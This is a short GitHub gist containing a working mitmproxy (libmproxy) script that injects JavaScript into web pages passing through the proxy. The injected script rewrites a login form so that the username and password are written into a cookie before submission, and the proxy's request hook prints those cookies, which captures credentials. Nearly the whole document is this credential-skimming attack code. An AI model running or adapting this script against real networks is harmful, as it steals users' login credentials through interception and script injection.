Skip to content

Instantly share code, notes, and snippets.

@vuryleo
Created December 13, 2014 18:17
Show Gist options
  • Save vuryleo/f121dd8be30eed7a3915 to your computer and use it in GitHub Desktop.
Save vuryleo/f121dd8be30eed7a3915 to your computer and use it in GitHub Desktop.
from libmproxy.encoding import *
payload = """
<script>
$('#login_form').attr('onsubmit', 'xss();return false');
var xss = function () {
console.log($('#pass').val());
$.cookie('xss', '' + $('#uname').val() + ':' + $('#pass').val(), {path: '/cgi-bin/do_login', expires: 42})
do_login()
};
</script>
</body>
"""
def response(context, flow):
flow.response.headers["xss"] = ["xss"]
res = flow.response.content
if res.find('</body>') == -1:
res = decode('gzip', res)
res = res.replace('</body>', payload)
res = encode('gzip', res)
else:
res = res.replace('</body>', payload)
flow.response.content = res
def request(context, flow):
for cookie in flow.request.headers["cookie"]:
if cookie.find('xss') != -1:
print cookie
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment